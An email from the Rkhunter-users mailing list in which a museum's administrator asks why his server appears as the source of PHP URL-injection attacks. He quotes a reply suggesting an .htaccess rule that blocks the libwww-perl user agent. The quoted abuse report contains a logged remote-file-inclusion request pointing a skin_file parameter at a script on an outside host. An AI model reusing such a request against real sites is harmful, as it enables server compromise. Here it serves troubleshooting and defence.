Hi! That much i understand. Problem is that its not my apache-log. The IP wich is showing up in the log is my server.(the one making the requests) So what is causing it? Cant fint any rootkits with rkhunter..
Cheers! /J On 3 dec 2007, at 13.33, Helmut Hullen wrote: > Hallo, Johan, > > Du (johan.sundstrom) meintest am 03.12.07: > >> IP Address of attacker: xxx.yyy.zzz.zzz > >> Type of attack: URL Injection -- attempt to inject / load files onto >> the server via PHP/CGI vulnerabilities > >> Sample log report including date and time stamp: > >> Request: onlinesurfnshop.com xxx.yyy.zzz.zzz - - >> [01/Dec/2007:16:59:21 -0800] "GET > >> /logos/banners//index.php?skin_file=http://www.n0n-clan.net//vwar/con >> vert/test.txt? HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-" > > I stop these nasty scripts with an entry in the ".htaccess" file in > the > apache "DocumentRoot": > > BrowserMatchNoCase "^libwww-perl" botnet > > order allow,deny > allow from all > deny from env=botnet > > You can choose another name than "botnet", you can add other > definitions > for this self defined environment variable(s). The "order/allow/deny" > block first allows "all" and then blocks all defined requests. > > Without this entry the tries result in error level 404 (or 500) in > "error_log". With this entry they produce error level 403. > > I have tried this entry on a website with about 2000 visits a day; > over > a month there was no "good" try with the Browser "libwww-perl". Only > nasty scripts. > > Viele Gruesse! > Helmut > > ------------------------------------------------------------------------- > SF.Net email is sponsored by: The Future of Linux Business White Paper > from Novell. From the desktop to the data center, Linux is going > mainstream. Let it simplify your IT future. > http://altfarm.mediaplex.com/ad/ck/8857-50307-18918-4 > _______________________________________________ > Rkhunter-users mailing list > Rkhunter-users@lists.sourceforge.net > https://lists.sourceforge.net/lists/listinfo/rkhunter-users - - Johan Sundström Västerbottens museum Box 3183 903 04 Umeå Tel. 090 - 17 18 33 Mobiltel. 070 - 321 84 04 E-post. [EMAIL PROTECTED] www . http://www.vasterbottensmuseum.se ------------------------------------------------------------------------- SF.Net email is sponsored by: The Future of Linux Business White Paper from Novell. From the desktop to the data center, Linux is going mainstream. Let it simplify your IT future. http://altfarm.mediaplex.com/ad/ck/8857-50307-18918-4 _______________________________________________ Rkhunter-users mailing list Rkhunter-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/rkhunter-users